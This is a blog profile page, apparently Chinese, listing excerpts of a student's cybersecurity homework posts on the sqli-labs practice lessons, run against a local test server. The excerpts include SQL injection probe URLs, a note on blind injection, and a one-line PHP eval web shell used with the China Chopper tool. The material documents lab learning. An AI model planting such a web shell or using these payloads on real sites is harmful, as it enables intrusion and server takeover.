- 博客(4)
- 收藏
- 关注
原创 我的网安作业2/21
一、SQL-labsLess81.判断是否存在SQL注入http://127.0.0.1/sqli/Less-8/?id=1http://127.0.0.1/sqli/Less-8/?id=1'由两次结果可知,存在SQL注入问题。2.构造正确的SQL语句http://127.0.0.1/sqli/Less-8/?id=1' --+3.开始猜解表名由于是布尔盲注,手动实在是太慢了,我觉得用burpsuite爆破都很麻烦,但是我自己的代码能力又很差,唉,彷佛看到了我的网安之路的终点
2021-02-21 21:55:36 116
原创 我的网安作业2/14
一、sql-labsLess71.前期准备在PHPstudy下的PHPTutorial/mysql/my.ini文件里面添加一句。(为了后期支持文件的读写)2.一句话木马在phpStudy\PHPTutorial\WWW的文件夹下新建一句话木马文本。根据后面出现的bug,正确的语句应该是:<?php @eval($_POST["a"]);?>启动中国菜刀:连接木马:两个基本函数:load_file()读取本地文件;into outfile 写文件。3.判断是否存在
2021-02-14 23:13:52 131 6
原创 我的网安作业2/7
一、sqli-labsless4:打开less4的index.php文件,在SQL语句下添加如下两句:echo $sql;echo "<br>";1.判断是否存在注入:http://127.0.0.1/sqli/Less-4/?id=1http://127.0.0.1/sqli/Less-4/?id=1'显式正确http://127.0.0.1/sqli/Less-4/?id=1"显式不正确得到报错信息:根据报错信息构造正确的SQL语句:http://127.0.0
2021-02-07 21:54:04 164 3
原创 我的网安作业
一Sqli-labs:由于是完全的新手,所以有很多都不太了解,嗯sqli-labs我做了第一第二第三关,原理都差不多所以以第三关为例:不知道为什么我的PHPstudy启动总是有问题。于是每次都得自己手动开启MySQL的服务:好了启动成功,开始进入正题。2021/1/31:1.判断是否有SQL注入http://127.0.0.1/sqli/Less-3/?id=1http://127.0.0.1/sqli/Less-3/?id=1’由于两次结果的显示明显不同,因此判断存在SQL注入漏
2021-01-31 21:38:47 120
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人